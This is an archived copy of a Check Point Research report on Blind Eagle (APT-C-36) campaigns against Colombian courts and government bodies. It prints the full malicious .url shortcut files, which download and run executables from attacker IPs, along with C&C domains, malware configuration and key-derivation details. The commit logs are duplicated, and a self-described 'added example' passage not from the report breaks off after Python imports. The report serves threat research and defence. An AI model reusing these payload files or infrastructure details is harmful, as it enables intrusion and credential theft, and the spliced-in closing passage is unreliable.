{
	"id": "d4ff7202-2b5b-40ff-a595-916d592a0525",
	"created_at": "2026-04-06T00:20:06.177514Z",
	"updated_at": "2026-04-10T13:12:26.916922Z",
	"deleted_at": null,
	"sha1_hash": "6443e6d70d7f834d28ebd54745fadb7ba6a297b8",
	"title": "Blind Eagle: …And Justice for All - Check Point Research",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1151458,
	"plain_text": "Blind Eagle: …And Justice for All - Check Point Research\r\nBy antoniost@checkpoint.com\r\nPublished: 2025-03-10 · Archived: 2026-04-02 10:56:43 UTC\r\nKey Points\r\nCheck Point Research discovered a series of ongoing campaigns targeting Colombian institutions and government\r\nentities since November 2024. The campaigns are linked to Blind Eagle, also known as APT-C-36, and deliver\r\nmalicious .url files, which cause a similar effect to the CVE-2024-43451 vulnerability.\r\nCVE-2024-43451 exposes a user’s NTLMv2 hash, which can allow an attacker to authenticate as the user via pass-the-hash or relay attacks. This vulnerability can be triggered just by right-clicking, deleting, or dragging the file.\r\nWhile the Blind Eagle malicious file does not exploit this vulnerability, it triggers a WebDAV request in the same\r\nuncommon ways, notifying the attacker that the file was downloaded. Finally, when the user clicks on the file, it\r\ndownloads the next-stage payload via another WebDAV request and executes the malware.\r\nMicrosoft patched the original vulnerability on November 12, 2024. Just six days later, Blind Eagle included this\r\n.url variant in its attack arsenal and campaigns.\r\nThe monitored campaigns targeted Colombian judicial institutions and other government or private organizations,\r\nwith high infection rates. More than 1,600 victims were affected during one of these campaigns which took place\r\naround December 19, 2024. This infection rate is significant considering Blind Eagle’s targeted APT approach.\r\nThe malware is often delivered using legitimate file-sharing platforms such as Google Drive and Dropbox.\r\nHowever, in recent campaigns, Blind Eagle has also distributed its payloads through Bitbucket and GitHub.\r\nThe group utilizes malware and tools which are well-known within underground crime communities, a trend that\r\ncontinues with recent discoveries. 
To protect its malware, Blind Eagle leverages the Packer-as-a-Service\r\nHeartCrypt, which employs a .NET RAT that appears to be a variant of PureCrypter. The final stage payload is\r\nRemcos RAT.\r\nBlind Eagle has long been suspected to originate from South America. We identified the group’s operating timezone\r\nas UTC-5, which aligns with several South American countries.\r\nOperation fail (OPFail) revealed phishing campaigns in early March 2024 in which the group impersonated\r\nColombian banks. These campaigns were highly successful, resulting in the collection of over 8,000 entries of\r\nPersonally Identifiable Information (PII).\r\nIntroduction\r\nAPT-C-36, also known as Blind Eagle, is a threat group that engages in both espionage and cybercrime. It primarily\r\ntargets organizations in Colombia and other Latin American countries. Active since 2018, this Advanced Persistent\r\nThreat (APT) group focuses on government institutions, financial organizations, and critical infrastructure.\r\nBlind Eagle is known for employing sophisticated social engineering tactics, using phishing emails with malicious\r\nattachments or links to gain initial access to target systems. Their malware arsenal includes commodity Remote Access\r\nTrojans (RATs) such as NjRAT, AsyncRAT, and Remcos.\r\nOur research revealed that the group recently expanded its toolkit with additional commodity malware. To protect their\r\nmalicious executables, Blind Eagle utilizes the Packer-as-a-Service HeartCrypt, which they use to pack a .NET RAT that\r\nappears to be a variant of PureCrypter. Remcos RAT remains the final payload.\r\nOn November 12, 2024, Microsoft patched a newly discovered vulnerability, CVE-2024-43451. This vulnerability was\r\nactively exploited in the wild using .url files containing malicious code, which could be triggered through unusual user\r\nactions such as right-clicking the file, deleting it, or performing a drag-and-drop operation. 
Exploited as a zero-day, it\r\nwas used in attacks targeting Ukraine. According to CERT-UA, the campaign was attributed to the threat actor UAC-0194,\r\nsuspected to be Russian-affiliated.\r\nSix days after Microsoft released the patch, Blind Eagle included a variant of this exploit in its attack arsenal and\r\ncampaigns. While this variant does not actually expose the NTLMv2 hash, it notifies the threat actors that the file was\r\ndownloaded by the same unusual user-file interactions. On devices vulnerable to CVE-2024-43451, a WebDAV request is\r\ntriggered even before the user manually interacts with the file with the same unusual behavior. Meanwhile, on both patched\r\nand unpatched systems, manually clicking the malicious .url file initiates the download and execution of the next-stage\r\npayload. After incorporating this file into their campaigns, the group targeted mainly Colombian public and private\r\norganizations, with high infection rates. More than 1600 victims were infected during a campaign that occurred around\r\nDecember 19, 2024. Considering Blind Eagle’s targeted APT approach, this infection rate is significant.\r\nBlind Eagle .url Payloads\r\nhttps://research.checkpoint.com/2025/blind-eagle-and-justice-for-all/\r\nPage 1 of 17\n\nCVE-2024-43451 is a vulnerability that exposes a user’s NTLMv2 hash, which can allow an attacker to authenticate as the\r\nuser via pass-the-hash or relay attacks. If the compromised account has high privileges and proper mitigations (such as SMB\r\nsigning and NTLM relay protections) that are not enforced, this could lead to lateral movement, privilege escalation, or even\r\nfull domain compromise. Eventually, the user, by manually clicking, creates an SMB connection through port 445, which\r\ndownloads and executes the malicious payload. 
The exploit reported by CERT-UA:\r\n[InternetShortcut]\r\nURL=file://92.42[.]96[.]30/pdp.nacs.gov.ua/Certificate_Activate_45052389_005553.exe\r\nIconIndex=1\r\nHotKey=0\r\nIDList=\r\nIconFile=C:\\\\Windows\\\\System32\\\\SHELL32.dll\r\n[{009862A0-0000-0000-C000-000000005986}]\r\nProp3=19,9\r\n[{000214A0-0000-0000-C000-000000000046}]\r\n[InternetShortcut.A]\r\n[InternetShortcut.W]\r\nURL=file://92.42[.]96[.]30/Activation/Certificate+AF8hFgBf-45052389+AF8-005553.exe\r\nCVE-2024-43451 affects all supported Windows versions, and it is triggered in uncommon ways:\r\nA single right-click on the file (all Windows versions).\r\nDeleting the file (Windows 10/11).\r\nDragging the file to another folder (Windows 10/11 and some Windows 7/8/8.1 configurations).\r\nThe .url file below, used by Blind Eagle against Colombian institutions, is a variant of this CVE, but without the\r\nexploiting part, meaning it does not expose the NTLMv2 hash. When manually clicked by the user, this file also downloads\r\nmalicious files, but instead of using SMB (port: 445), it uses HTTP. When a URL is in UNC Path format, it first attempts an\r\nSMB connection, and if this is unavailable, it attempts WebDAV. 
However, once the port is specified, which in this case is\r\n@80, the SMB attempt is avoided, and the connection is made directly over HTTP with the User-Agent Microsoft-WebDAV-MiniRedir/10.0.19044.\r\n[{009862A0-0000-0000-C000-000000005986}]\r\nProp3=19,2\r\n[InternetShortcut]\r\nIconIndex=11\r\nIconFile=C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\r\nIDList=\r\nURL=file://\\\\\\\\62.60[.]226[.]64@80\\\\file\\\\4025_3980.exe\r\nHotKey=0\r\nWhile this variant does not directly exploit the vulnerability, it exhibits unusual behavior by communicating with the server\r\nwithout requiring manual user interaction. However, for the .url file to download the next-stage payload, the user must\r\nmanually click it, which triggers a WebDAV request over port 80.\r\nThis variant serves as a valuable tool for threat actors, as it notifies them when a targeted user downloads the malicious\r\n.url file. Even if the user does not directly execute the file, Blind Eagle can still detect the interaction, providing insight\r\ninto potential targets.\r\nFigure 1 – Unpatched Vulnerable – Windows 7, Right Click WebDAV request.\r\nSince Microsoft patched this vulnerability, this unusual behavior no longer occurs. 
However, manual user interaction can\r\nstill trigger the download and execution of the malicious payload.\r\nFigure 2 – Patched – Windows 10, execution.\r\nBlind Eagle Campaigns\r\nMicrosoft published this vulnerability on November 12, 2024. On November 18, we observed the first crafted payload. This\r\n.url file infected both patched and unpatched machines. Since then, we observed multiple campaigns targeting Colombia,\r\nand the dropped payload was a .NET RAT that downloads the final stage, a Remcos RAT, from GitHub or Bitbucket.\r\nHowever, to this day, most of those .url files are not detected by any Anti-Virus engine on VirusTotal.\r\nFigure 3 – First stage .url undetected on VT.\r\nThese ongoing campaigns, based on filenames, appear to primarily target various Colombian government organizations,\r\nincluding the Justice System. These are some of the malicious .url filenames:\r\n[Filename] - Juzgados de ejecución de sentencias de bogotá con función de conocimiento programó diligencia de\r\nCONTINUACIÓN JUICIO ORAL REFERENCIA.url\r\n[English] - \"Courts of sentence execution in Bogotá with knowledge function scheduled a hearing for the continuation of the\r\noral trial in reference.\"\r\n[Filename] - NOTIFICACIÓN_AUDIENCIA_TOMA_DE_MUESTRA_QUE_INVOLUCREN_IMPUTADO.url\r\n[English] - \"Notification of hearing for the taking of samples involving the defendant.\"\r\n[Filename] - QUERELLA_JUDICIAL_No7254178000020150023000_Juzgado 9 Municipal de Pequeñas Causas Laborales\r\nde Bogotá.url\r\n[English] - \"Judicial Complaint No. 7254178000020150023000, 9th Municipal Court of Small Labor Causes of Bogotá.\"\r\n[Filename] - este despacho le informa que deberá comparecer ante el Juzgado Penal (6to) del Circuito de Bogot.url\r\n[English] - \"This office informs you that you must appear before the 6th Criminal Court of the Circuit of Bogotá.\"\r\n[Filename] - en virtud del artículo 220 de la Ley colombiana/Juzgados de Ejecución De Penas y Medidas De Seguridad.url\r\n[English] - \"By virtue of Article 220 of Colombian Law / Courts of Execution of Sentences and Security Measures.\"\r\n[Filename] - COMUNICADO N° 00239948 PROFERIDO PENAL 00028483 28 DE NOVIEMBRE/OFICIO N° 00239948\r\nPROFERIDO PENAL 00028483 28 DE NOVIEMBRE.url\r\n[English] - \"Communication No. 00239948 issued Criminal 00028483 November 28 / Official Letter No. 00239948 issued\r\nCriminal 00028483 November 28.\"\r\n[Filename] - Oficio Tutelar 0439594 - Proceso N° 03948939-002024.url\r\n[English] - \"Protective Order 0439594 - Case No. 03948939-002024.\"\r\nWhile operating with the specific malicious file for over two months, the APT group has rotated through approximately\r\nten or more different C\u0026Cs (Command and Control servers) for its final stage payload. The attack chain has some small variations,\r\nbut the .url files are always part of the campaign during the initial stage.\r\nCampaigns ‘socialismo’ \u0026 ‘miami’ – January 21-22, 2025\r\nDuring the campaigns that took place around January 21 and 22, 2025, the APT group distributed multiple .url files via\r\nemail through possibly compromised Google Drive accounts.\r\nFigure 4 – Email with Google Drive link.\r\nThe specified file icon in the .url file is equivalent to the one from the Edge browser. 
Many of the endpoints contacted by\r\nthe .url contain multiple malicious files, though we cannot attribute all files hosted on those servers to Blind Eagle.\r\n[{009862A0-0000-0000-C000-000000005986}]\r\nProp3=19,2\r\n[InternetShortcut]\r\nIconIndex=11\r\nIconFile=C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe\r\nIDList=\r\nURL=file://\\\\\\\\62.60.226[.]64@80\\\\file\\\\3819_5987.exe\r\nHotKey=0\r\nThe downloaded executable appears to be packed using the Packer-as-a-Service HeartCrypt. This later injects into\r\ncsc.exe a .NET executable responsible for unpacking and executing in memory a .NET RAT, which appears to be a\r\nvariant of PureCrypter. This .NET RAT retrieves various user and machine information such as 1) Username, 2) OS\r\nVersion, 3) Process name and architecture, 4) Antivirus installed, and other machine specs. After it decrypted its\r\nconfiguration, which is embedded as a resource, we observed the campaign ID socialismo and the C\u0026C with which it\r\ncommunicates. The C\u0026C republicadominica2025[.]ip-ddns[.]com, after it received the user data, responded with a URL\r\nto download and execute the next stage payload. 
The final stage is downloaded from the GitHub repository\r\nOscarito20222/file, and the malware is the known Remote Access Trojan Remcos RAT with C\u0026C elyeso.ip-ddns[.]com:30204 and Botnet name redtube.\r\nFigure 5 – Campaign socialismo attack chain.\r\nBoth of the domain names from the .NET RAT and the Remcos RAT resolve to the same IP address 177.255.85[.]101.\r\nThe group has used this IP for multiple Remcos C\u0026Cs through January \u0026 February campaigns:\r\namuntgroupfree.ip-ddns[.]com\r\ndonato.con-ip[.]com\r\nelyeso.ip-ddns[.]com\r\ncomina998.ddns-ip[.]net\r\nrepublicadominica2025.ip-ddns[.]com\r\nIt is worth mentioning that the attacker’s GitHub repository is used in multiple Blind Eagle campaigns to deliver the final\r\nstage payload, Remcos. This repository is constantly updated with new files that communicate with the latest C\u0026C. All the\r\nrepository updates were committed in the timezone -0500, which could possibly indicate Blind Eagle’s country of origin\r\naligns with South American countries. 
Examples of commits:\r\n==================================================\r\n[2025-02-04T20:00:59Z] Author: Oscarito20222\r\ntree 62c86b52fabaaecc398b902965e58c4154edc427\r\nparent a84f5a384b090598cd29be6b2492cbb45c73c3ac\r\nauthor Oscarito20222 \u003c121189488+Oscarito20222@users.noreply.github.com\u003e 1738699259 -0500\r\ncommitter GitHub \u003cnoreply@github.com\u003e 1738699259 -0500\r\nAdd files via upload\r\n * fuck.exe - 3bd90557615ef95e4244bdbaa8e0e7fd949cdd3a\r\n * redtube.exe - 758c73ab9706ae6977f9b4601c20b3667836d3ef\r\n * roma.exe - ba95ea1dcc744566a9552d9665feff035925a5c5\r\n==================================================\r\n[2025-02-06T15:51:50Z] Author: Oscarito20222\r\ntree 220a606655d64d03762d319c5f5b80038e5bc13c\r\nparent 29335b62acef53cb7076f81b8fa25e9baf6d9994\r\nauthor Oscarito20222 \u003c121189488+Oscarito20222@users.noreply.github.com\u003e 1738857110 -0500\r\ncommitter GitHub \u003cnoreply@github.com\u003e 1738857110 -0500\r\nDelete roma.exe\r\n==================================================\r\n[2025-02-06T15:52:02Z] Author: Oscarito20222\r\ntree e9e56beee7cf526a4df97e35f2df9458cae0ec23\r\nparent b7f7fe7ce6d5eb7453ca5edd616bc9f071cd3ea5\r\nauthor Oscarito20222 \u003c121189488+Oscarito20222@users.noreply.github.com\u003e 1738857122 -0500\r\ncommitter GitHub \u003cnoreply@github.com\u003e 1738857122 -0500\r\nDelete redtube.exe\r\n==================================================\r\n[2025-02-06T15:52:11Z] Author: Oscarito20222\r\ntree 4b825dc642cb6eb9a060e54bf8d69288fbee4904\r\nparent d2279dc66302d8afad41c82ad81d0733e1f2273d\r\nauthor Oscarito20222 \u003c121189488+Oscarito20222@users.noreply.github.com\u003e 1738857131 -0500\r\ncommitter GitHub \u003cnoreply@github.com\u003e 1738857131 -0500\r\nDelete fuck.exe\r\n==================================================\r\n[2025-02-06T15:52:33Z] Author: Oscarito20222\r\ntree 5d1edc470b4b33a31f982077e08b2e61f438feab\r\nparent a7b74e834eddb6eb9a23a268c7088b3aeba493d4\r\nauthor Oscarito20222 \u003c121189488+Oscarito20222@users.noreply.github.com\u003e 1738857153 -0500\r\ncommitter GitHub \u003cnoreply@github.com\u003e 1738857153 -0500\r\nAdd files via upload\r\n * normales.exe - 3d3248ad14dce8b6fcf416d56d8de52b07b549e7\r\nThe GitHub account also contains another repository named diciembre, which includes an archive with a .vbs file.\r\nNotably, this commit from two years ago was made in the same UTC-5 timezone as the recent activity.\r\nFigure 6 – Blind Eagle GitHub account.\r\nThis repository, which was “untouched” for over two years, was updated on February 25, 2025, and introduced a new\r\nRemcos RAT with C\u0026C 21ene.ip-ddns[.]com:30204.\r\nFigure 7 – Recent diciembre repository campaigns.\r\nCampaigns ‘PARAISO’, ‘PARAISO2’, ‘marte’ \u0026 ‘saturno’ – December 2024\r\nAlthough similar to the previous campaign, this one leveraged Bitbucket instead of GitHub as the final-stage distribution\r\nplatform.\r\nCampaign | .NET RAT C\u0026C | Remcos C\u0026C | Remcos ITW\r\n[2024-12-10] marte | newstaticfreepoint24.ddns-ip[.]net -\u003e 181.131.217.244 | newstaticfreepoint24.ddns-ip[.]net | bitbucket[.]org/facturacioncol/fact/downloads/FileHosting.exe, bitbucket[.]org/facturacioncol/fact/downloads/luna.exe\r\n[2024-12-11] saturno | newstaticfreepoint24.ddns-ip[.]net | newstaticfreepoint24.ddns-ip[.]net | bitbucket[.]org/facturacioncol/fact/downloads/Out2.exe\r\n[2024-12-19] PARAISO | newstaticfreepoint24.ddns-ip[.]net | newstaticfreepoint24.ddns-ip[.]net | bitbucket[.]org/trabajo12023/proyecto/downloads/ROSAS.exe, bitbucket[.]org/trabajo12023/proyecto/downloads/Final1278685280\r\n[2024-12-19] PARAISO2 | newstaticfreepoint24.ddns-ip[.]net | newstaticfreepoint24.ddns-ip[.]net, 17dic.ydns[.]eu -\u003e 181.131.217.244 | bitbucket[.]org/trabajo12023/proyecto/downloads/AD.exe, bitbucket[.]org/trabajo12023/proyecto/downloads/Simpson.exe, bitbucket[.]org/trabajo12023/proyecto/downloads/Final1278685280\r\nIn these campaigns, two Bitbucket repositories were abused and contained Remcos RAT executable files, which were\r\nuploaded to Bitbucket around December 2024. Considering this APT group’s activity and approach, a significant number\r\nof victims ultimately downloaded these malicious executables.\r\nFigure 8 – facturacioncol/fact Bitbucket repository.\r\nThe PARAISO campaign was very successful, infecting more than 1600 victims with Remcos RAT and C\u0026C\r\nnewstaticfreepoint24.ddns-ip.net:3020. The total infections across those campaigns, which occurred for over a week,\r\nwere approximately 9,000.\r\nFigure 9 – trabajo12023/proyecto Bitbucket repository.\r\nBlind Eagle – .url Campaigns\r\nSince adding this file to its arsenal, Blind Eagle consistently targeted Colombia, primarily focusing on justice and other\r\ngovernment organizations. The group sent emails with malicious Google Drive links containing either an archive or the\r\nactual .url. Those files triggered WebDAV requests on unpatched machines and, once clicked by the user, resulted in a\r\nWebDAV request that downloaded a HeartCrypt-packed malware. This malware then extracted and injected a packed .NET\r\nloader into csc.exe, which later loaded a .NET RAT which appears to be a variant of PureCrypter. This .NET RAT\r\ndecrypted its configuration, which contains execution parameters such as the C\u0026C server and the campaign ID. 
After\r\nsending encrypted user data, the malware receives a URL to download the final stage payload, Remcos RAT. Those final\r\npayloads were initially hosted on compromised servers and later on GitHub or Bitbucket.\r\nFigure 10 – Blind Eagle November until February Campaigns.\r\nThroughout multiple campaigns, the group registered different domain names for its C\u0026C servers, even though they were\r\nhosted on the same IP address. During campaigns such as socialismo, the C\u0026C of the .NET RAT was\r\nrepublicadominica2025[.]ip-ddns[.]com and for the final stage elyeso.ip-ddns[.]com, but both of them resolved to the\r\nsame IP 177[.]255.85[.]101.\r\nAPT OPFail \u0026 Past Phishing Campaigns\r\nWhile closely monitoring Blind Eagle activities, Check Point Research discovered an operation failure in which the\r\ngroup revealed its past phishing activities together with the victims’ Personally Identifiable Information (PII).\r\nDuring January and February, the APT group delivered the last stage payload via files uploaded to the Oscarito20222/file\r\nrepository. The account Oscarito20222 also had another repository, which had only one commit from two years ago,\r\nOscarito20222/diciembre.\r\nOn February 25, 2025, this changed. The repository diciembre received updates and also began delivering Remcos during\r\nthe next campaigns. 
To understand why this shift occurred, we had to examine the previous repository responsible for\r\ndelivering the final payload in the attack chain.\r\nOscarito20222/file final commits:\r\n==================================================\r\n[2025-02-25T14:01:33Z] Author: Oscarito20222\r\ntree f03354f986a1398d1b471c0af75b404474cf94f7\r\nparent 9653938c6fd4b347209d87923f3617d70a3c12e2\r\nauthor Oscarito20222 \u003c121189488+Oscarito20222@users.noreply.github.com\u003e 1740492093 -0500\r\ncommitter GitHub \u003cnoreply@github.com\u003e 1740492093 -0500\r\nAdd files via upload\r\n * Ver Datos del Formulario.html - e0837aebd649dba01bc4d594ef21a8086edaaeeb\r\n==================================================\r\n[2025-02-25T15:27:01Z] Author: Oscarito20222\r\ntree 63a5c5307b93e0393aba14b42d7915ab7a2733ef\r\nparent 12eacb556eee889a16beb2fe9449748ebb4e33b0\r\nauthor Oscarito20222 \u003c121189488+Oscarito20222@users.noreply.github.com\u003e 1740497221 -0500\r\ncommitter GitHub \u003cnoreply@github.com\u003e 1740497221 -0500\r\nDelete Ver Datos del Formulario.html\r\nThe group uploaded an HTML file named Ver Datos del Formulario.html, which remained in the repository for\r\napproximately 1 hour and 27 minutes before it was deleted. 
As of now, this remains the last recorded action in the repository, which occurred on February 25,\r\n2025, at 15:27 UTC.\r\nFigure 11 – Last commits for the repository Oscarito20222/file .\r\nAt this point, Blind Eagle resumed its activity, using the repository Oscarito20222/diciembre , with the first commit\r\ntaking place at 17:39 UTC the same day:\r\n==================================================\r\n[2022-12-21T17:31:25Z] Author: Oscarito20222\r\ntree 67eb4f5d839ca89b28203a27ce3ca74029b93b7c\r\nauthor Oscarito20222 \u003c121189488+Oscarito20222@users.noreply.github.com\u003e 1671643885 -0500\r\ncommitter GitHub \u003cnoreply@github.com\u003e 1671643885 -0500\r\n* 2112-2.7z - 4e3cb251fb98a47c2f5dec5f3722723990c17a49\r\n==================================================\r\n[2025-02-25T17:39:17Z] Author: Oscarito20222\r\ntree 1b6fc5c2150d598472f892a88305545626d977bd\r\nparent de2b332d06251e6449760ceead598a56da637daa\r\nauthor Oscarito20222 \u003c121189488+Oscarito20222@users.noreply.github.com\u003e 1740505157 -0500\r\ncommitter GitHub \u003cnoreply@github.com\u003e 1740505157 -0500\r\nhttps://research.checkpoint.com/2025/blind-eagle-and-justice-for-all/\r\nPage 11 of 17\n\n* sena.exe - abf71fd332b760da29aa211f4aaa1661860a98c6\r\n==================================================\r\n[2025-02-25T17:39:29Z] Author: Oscarito20222\r\ntree 3262538dbe881b34cfd71cedcb27e03688573f0e\r\nparent 408d7ef19b151668e2445532e06c6b3a569ebf98\r\nauthor Oscarito20222 \u003c121189488+Oscarito20222@users.noreply.github.com\u003e 1740505169 -0500\r\ncommitter GitHub \u003cnoreply@github.com\u003e 1740505169 -0500\r\n==================================================\r\n[2025-02-26T15:07:11Z] Author: Oscarito20222\r\ntree d119d827561c0796c50deb8cf69f324811479e88\r\nparent d645bd6c880358d2bb4dfd83252ebbb6156c6b5c\r\nauthor Oscarito20222 \u003c121189488+Oscarito20222@users.noreply.github.com\u003e 1740582431 -0500\r\ncommitter GitHub \u003cnoreply@github.com\u003e 1740582431 
-0500\r\n* TobaccoAnnouncement.exe - 44182ce5a8fadef41064d7c0266e8f99015262b0\r\n================================================== [2022-12-21T17:31:25Z] Author: Oscarito20222 tree\r\n67eb4f5d839ca89b28203a27ce3ca74029b93b7c author Oscarito20222\r\n\u003c121189488+Oscarito20222@users.noreply.github.com\u003e 1671643885 -0500 committer GitHub \u003cnoreply@github.com\u003e\r\n1671643885 -0500 Add files via upload * 2112-2.7z - 4e3cb251fb98a47c2f5dec5f3722723990c17a49\r\n================================================== [2025-02-25T17:39:17Z] Author: Oscarito20222 tree\r\n1b6fc5c2150d598472f892a88305545626d977bd parent de2b332d06251e6449760ceead598a56da637daa author\r\nOscarito20222 \u003c121189488+Oscarito20222@users.noreply.github.com\u003e 1740505157 -0500 committer GitHub\r\n\u003cnoreply@github.com\u003e 1740505157 -0500 Add files via upload * sena.exe - abf71fd332b760da29aa211f4aaa1661860a98c6\r\n================================================== [2025-02-25T17:39:29Z] Author: Oscarito20222 tree\r\n3262538dbe881b34cfd71cedcb27e03688573f0e parent 408d7ef19b151668e2445532e06c6b3a569ebf98 author\r\nOscarito20222 \u003c121189488+Oscarito20222@users.noreply.github.com\u003e 1740505169 -0500 committer GitHub\r\n\u003cnoreply@github.com\u003e 1740505169 -0500 Delete 2112-2.7z\r\n================================================== [2025-02-26T15:07:11Z] Author: Oscarito20222 tree\r\nd119d827561c0796c50deb8cf69f324811479e88 parent d645bd6c880358d2bb4dfd83252ebbb6156c6b5c author\r\nOscarito20222 \u003c121189488+Oscarito20222@users.noreply.github.com\u003e 1740582431 -0500 committer GitHub\r\n\u003cnoreply@github.com\u003e 1740582431 -0500 Add files via upload * TobaccoAnnouncement.exe -\r\n44182ce5a8fadef41064d7c0266e8f99015262b0\r\n==================================================\r\n[2022-12-21T17:31:25Z] Author: Oscarito20222\r\ntree 67eb4f5d839ca89b28203a27ce3ca74029b93b7c\r\nauthor Oscarito20222 \u003c121189488+Oscarito20222@users.noreply.github.com\u003e 
1671643885 -0500\r\ncommitter GitHub \u003cnoreply@github.com\u003e 1671643885 -0500\r\nAdd files via upload\r\n * 2112-2.7z - 4e3cb251fb98a47c2f5dec5f3722723990c17a49\r\n==================================================\r\n[2025-02-25T17:39:17Z] Author: Oscarito20222\r\ntree 1b6fc5c2150d598472f892a88305545626d977bd\r\nparent de2b332d06251e6449760ceead598a56da637daa\r\nauthor Oscarito20222 \u003c121189488+Oscarito20222@users.noreply.github.com\u003e 1740505157 -0500\r\ncommitter GitHub \u003cnoreply@github.com\u003e 1740505157 -0500\r\nAdd files via upload\r\n * sena.exe - abf71fd332b760da29aa211f4aaa1661860a98c6\r\n==================================================\r\n[2025-02-25T17:39:29Z] Author: Oscarito20222\r\ntree 3262538dbe881b34cfd71cedcb27e03688573f0e\r\nparent 408d7ef19b151668e2445532e06c6b3a569ebf98\r\nauthor Oscarito20222 \u003c121189488+Oscarito20222@users.noreply.github.com\u003e 1740505169 -0500\r\ncommitter GitHub \u003cnoreply@github.com\u003e 1740505169 -0500\r\nDelete 2112-2.7z\r\nhttps://research.checkpoint.com/2025/blind-eagle-and-justice-for-all/\r\nPage 12 of 17\n\n==================================================\r\n[2025-02-26T15:07:11Z] Author: Oscarito20222\r\ntree d119d827561c0796c50deb8cf69f324811479e88\r\nparent d645bd6c880358d2bb4dfd83252ebbb6156c6b5c\r\nauthor Oscarito20222 \u003c121189488+Oscarito20222@users.noreply.github.com\u003e 1740582431 -0500\r\ncommitter GitHub \u003cnoreply@github.com\u003e 1740582431 -0500\r\nAdd files via upload\r\n * TobaccoAnnouncement.exe - 44182ce5a8fadef41064d7c0266e8f99015262b0\r\nOpfail Timeline:\r\n2025-02-25 14:01 UTC, Blind Eagle uploads to Oscarito20222/file HTML PII data from phishing activities.\r\n2025-02-25 15:27 UTC, Deletes HTML file containing PII.\r\n2025-02-25 17:39 UTC, Uploads Remcos RAT with C\u0026C 21ene.ip-ddns[.]com to Oscarito20222/diciembre\r\nrepository\r\n2025-02-25 17:39 UTC, Deletes archive from Oscarito20222/diciembre that was uploaded approximately two\r\nyears 
ago.\r\nCheck Point Research obtained this HTML file, which is linked to phishing activity from early March 2024. The phishing domain servicioseguroenlineabb[.]com appears to have impersonated Colombian banks.\r\nThe PII data contains five fields:\r\n1. Nombre de Usuario (Username)\r\n2. Contraseña Usuario (User Password)\r\n3. Correo electrónico (Email)\r\n4. Contraseña del correo (Email Password)\r\n5. Clave Cajero (ATM PIN)\r\nThe dataset (referred to as “Datos del Formulario”) contained over 8,400 entries, 8,075 of which remained valid after filtering out empty or insufficient records. These valid entries included account-password pairs (username, email, or all fields filled), with 1,634 email addresses identified.\r\nThe phishing campaign specifically targeted Colombian users. Among the collected email addresses:\r\nThe majority were personal accounts (Gmail, Yahoo, Hotmail, etc.).\r\nFive belonged to the Colombian government:\r\ncorreo.policia.gov.co\r\nsic.gov.co\r\ncontraloria.gov.co\r\nadr.gov.co\r\ndian.gov.co\r\nFourteen were associated with educational institutions.\r\nThe remaining addresses belonged to businesses operating in Colombia.\r\n.NET RAT – “Remcos Downloader”\r\nThe .NET RAT delivered during the malware campaigns is protected with HeartCrypt, a Packer-as-a-Service (PaaS) that emerged in early 2024 to obfuscate malware and evade detection by security software. This packer embeds malicious code into otherwise legitimate binaries, with the packed payload stored as a resource. When executed, HeartCrypt first unpacks a simple .NET packer, which is injected into and triggered within csc.exe.\r\nThis .NET packer contains an embedded buffer that is:\r\n1. Decrypted using AES\r\n2. Decompressed with GZIP\r\n3. 
Loaded into memory as a .NET RAT assembly\r\nIn addition, the final executable (the .NET RAT assembly) is obfuscated with NET-Reactor, which applies both string encryption and control flow obfuscation to further hinder analysis.\r\nFigure 12 – .NET Packer, Unpacking process.\r\nMost of the strings are encrypted and stored inside a resource, which is decrypted as soon as execution begins. Each time a specific string is required, the malware requests it by index ID, where the index points to the DWORD size of the string followed by the string content. The decrypted variable (holding the decrypted string resource) follows the layout in which strings are stored in the #US stream of .NET binaries. NETReactorSlayer (a well-known open-source deobfuscator for NET-Reactor-protected binaries) is able to decrypt those strings and deobfuscate such binaries.\r\nFigure 13 – Function that retrieves String based on index ID.\r\nThe decrypted resource contains a base64 string (truncated below) which is deserialized into the malware configuration, including the C\u0026C:\r\nCmIKIXJlcHVibGljYWRvbWluaWNhMjAyNS5pcC1kZG5zLmNvbRD56wEYBSIIbW9ubzEyMzQyCnNvY2lhbGlzbW9CElNwb25zb3JzaGlwVGltZW\r\n{\r\n \"1\": {\r\n \"1\": \"republicadominica2025[.]ip-ddns[.]com\",\r\n \"2\": 30201,\r\n \"3\": 5,\r\n \"4\": \"mono1234\",\r\n \"6\": \"socialismo\",\r\n \"8\": \"SponsorshipTimeout\",\r\n \"12\": \"NextActivator\"\r\n }\r\n}\r\nThe malware collects information about the execution, the machine, and the user, serializes it using protobuf, and encrypts it using AES. Data sent to the C\u0026C:\r\nBot ID\r\nCampaign ID: socialismo\r\nUsername\r\nOS Version\r\nMalware version: 0.3.9\r\nAntivirus installed\r\nProcess Architecture\r\nProcess name\r\nMachine specs …\r\nThe malware first attempts to resolve the C\u0026C domain name (GetHostAddresses) and, if successful, sends the collected information.\r\nFigure 14 – GetHostAddresses with C\u0026C.\r\nThe serialized machine information is sent along with the campaign name socialismo and the version 0.3.9.\r\nFigure 15 – Data Serialization.\r\nThe AES key used to encrypt and decrypt network communications is derived by calling Rfc2898DeriveBytes with the mutex name mono1234 as the password and the salt { 1, 2, 23, 234, 37, 48, 134, 63, 248, 4 }.\r\nFigure 16 – AES Key generation.\r\nThe response from the C\u0026C server is retrieved in a similar way: the server replies with a buffer containing the DWORD size followed by the AES-encrypted buffer. 
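As an added example (not code from the report or from the malware itself), the following Python reconstructs the three parts of this section an analyst has to get right: the configuration is protobuf wire format, which is why the decoded keys are bare field numbers (decoding the base64 prefix printed above as protobuf yields exactly the values shown); the network key comes from Rfc2898DeriveBytes, which is PBKDF2 over HMAC-SHA1; and the C\u0026C reply is a DWORD length followed by ciphertext. The sample config blob is constructed from the decoded values above because the page's base64 is truncated. The 32-byte key length, the 1000 iterations (the .NET defaults), the UTF-8 password encoding and the little-endian DWORD are assumptions not stated in the report, and decrypting the frame body is left to an AES library.

```python
# Added example, not code from the Check Point report or from the malware:
# a schema-less protobuf wire-format decoder for the .NET RAT configuration,
# the Rfc2898DeriveBytes (PBKDF2-HMAC-SHA1) key derivation the report
# describes, and a splitter for the DWORD-length-prefixed C2 response frame.
# Assumptions not stated on the page: 32-byte key and 1000 iterations (the
# .NET Rfc2898DeriveBytes defaults), UTF-8 password bytes, little-endian DWORD.
import base64
import hashlib
import struct

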